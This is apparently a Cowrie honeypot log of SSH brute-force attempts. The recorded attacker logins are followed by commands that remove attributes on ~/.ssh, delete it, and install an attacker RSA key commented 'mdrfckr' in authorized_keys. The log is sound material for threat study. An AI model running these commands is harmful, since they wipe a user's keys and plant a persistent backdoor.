{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:36:10.335193Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:36:10.677126Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:36:10.677782Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:36:10.802507Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:36:10.803310Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60452,"dst_ip":"1.2.3.4","dst_port":22,"session":"952f7b2560eb","protocol":"ssh","message":"New connection: 212.227.235.229:60452 (1.2.3.4:22) [session: 952f7b2560eb]","sensor":"my-vps","timestamp":"2025-09-08T14:36:10.924095Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:36:10.924682Z","src_ip":"212.227.235.229","session":"952f7b2560eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:36:11.046901Z","src_ip":"212.227.235.229","session":"952f7b2560eb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:36:11.579731Z","src_ip":"212.227.235.229","session":"952f7b2560eb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:36:12.704305Z","src_ip":"212.227.235.229","session":"952f7b2560eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60454,"dst_ip":"1.2.3.4","dst_port":22,"session":"1279df6ca1f5","protocol":"ssh","message":"New connection: 212.227.235.229:60454 (1.2.3.4:22) [session: 1279df6ca1f5]","sensor":"my-vps","timestamp":"2025-09-08T14:36:12.825707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:36:12.826418Z","src_ip":"212.227.235.229","session":"1279df6ca1f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:36:12.948725Z","src_ip":"212.227.235.229","session":"1279df6ca1f5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:36:13.489717Z","src_ip":"212.227.235.229","session":"1279df6ca1f5"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:36:13.616100Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:36:13.616893Z","src_ip":"212.227.235.229","session":"1279df6ca1f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44580,"dst_ip":"1.2.3.4","dst_port":22,"session":"9712dd74a7aa","protocol":"ssh","message":"New connection: 212.227.235.229:44580 (1.2.3.4:22) [session: 9712dd74a7aa]","sensor":"my-vps","timestamp":"2025-09-08T14:37:14.172284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:37:14.172946Z","src_ip":"212.227.235.229","session":"9712dd74a7aa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:37:14.294549Z","src_ip":"212.227.235.229","session":"9712dd74a7aa"}
{"eventid":"cowrie.login.failed","username":"pcp","password":"12345","message":"login attempt [pcp/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T14:37:14.821892Z","src_ip":"212.227.235.229","session":"9712dd74a7aa"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:37:15.945027Z","src_ip":"212.227.235.229","session":"9712dd74a7aa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41842,"dst_ip":"1.2.3.4","dst_port":22,"session":"d26b0f4145f3","protocol":"ssh","message":"New connection: 212.227.235.229:41842 (1.2.3.4:22) [session: d26b0f4145f3]","sensor":"my-vps","timestamp":"2025-09-08T14:38:19.691856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:38:19.692928Z","src_ip":"212.227.235.229","session":"d26b0f4145f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:38:19.815089Z","src_ip":"212.227.235.229","session":"d26b0f4145f3"}
{"eventid":"cowrie.login.failed","username":"cacti","password":"!","message":"login attempt [cacti/!] failed","sensor":"my-vps","timestamp":"2025-09-08T14:38:20.347666Z","src_ip":"212.227.235.229","session":"d26b0f4145f3"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:38:21.473001Z","src_ip":"212.227.235.229","session":"d26b0f4145f3"}
{"eventid":"cowrie.session.connect","src_ip":"106.254.237.82","src_port":59180,"dst_ip":"1.2.3.4","dst_port":23,"session":"66bb362bef7d","protocol":"telnet","message":"New connection: 106.254.237.82:59180 (1.2.3.4:23) [session: 66bb362bef7d]","sensor":"my-vps","timestamp":"2025-09-08T14:38:59.692568Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37164,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6fce847866c","protocol":"ssh","message":"New connection: 212.227.235.229:37164 (1.2.3.4:22) [session: d6fce847866c]","sensor":"my-vps","timestamp":"2025-09-08T14:39:28.750058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:39:28.751935Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:39:28.874640Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.login.success","username":"root","password":"Cq123456","message":"login attempt [root/Cq123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:39:29.405247Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:39:29.670409Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:39:29.671157Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:39:29.672540Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:39:29.796210Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:39:30.142864Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:39:30.143544Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.session.closed","duration":30.453066110610962,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:39:30.145545Z","src_ip":"106.254.237.82","session":"66bb362bef7d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:39:30.268335Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:39:30.269271Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37166,"dst_ip":"1.2.3.4","dst_port":22,"session":"2163b7433d90","protocol":"ssh","message":"New connection: 212.227.235.229:37166 (1.2.3.4:22) [session: 2163b7433d90]","sensor":"my-vps","timestamp":"2025-09-08T14:39:30.388872Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:39:30.389982Z","src_ip":"212.227.235.229","session":"2163b7433d90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:39:30.511706Z","src_ip":"212.227.235.229","session":"2163b7433d90"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:39:31.042085Z","src_ip":"212.227.235.229","session":"2163b7433d90"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:39:32.166193Z","src_ip":"212.227.235.229","session":"2163b7433d90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37174,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8bfa26916ae","protocol":"ssh","message":"New connection: 212.227.235.229:37174 (1.2.3.4:22) [session: b8bfa26916ae]","sensor":"my-vps","timestamp":"2025-09-08T14:39:32.285199Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:39:32.285869Z","src_ip":"212.227.235.229","session":"b8bfa26916ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:39:32.405511Z","src_ip":"212.227.235.229","session":"b8bfa26916ae"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:39:32.925008Z","src_ip":"212.227.235.229","session":"b8bfa26916ae"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:39:33.046514Z","src_ip":"212.227.235.229","session":"b8bfa26916ae"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:39:33.047513Z","src_ip":"212.227.235.229","session":"d6fce847866c"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":50894,"dst_ip":"1.2.3.4","dst_port":22,"session":"95a642e43e54","protocol":"ssh","message":"New connection: 8.138.136.155:50894 (1.2.3.4:22) [session: 95a642e43e54]","sensor":"my-vps","timestamp":"2025-09-08T14:40:03.265904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T14:40:03.266751Z","src_ip":"8.138.136.155","session":"95a642e43e54"}
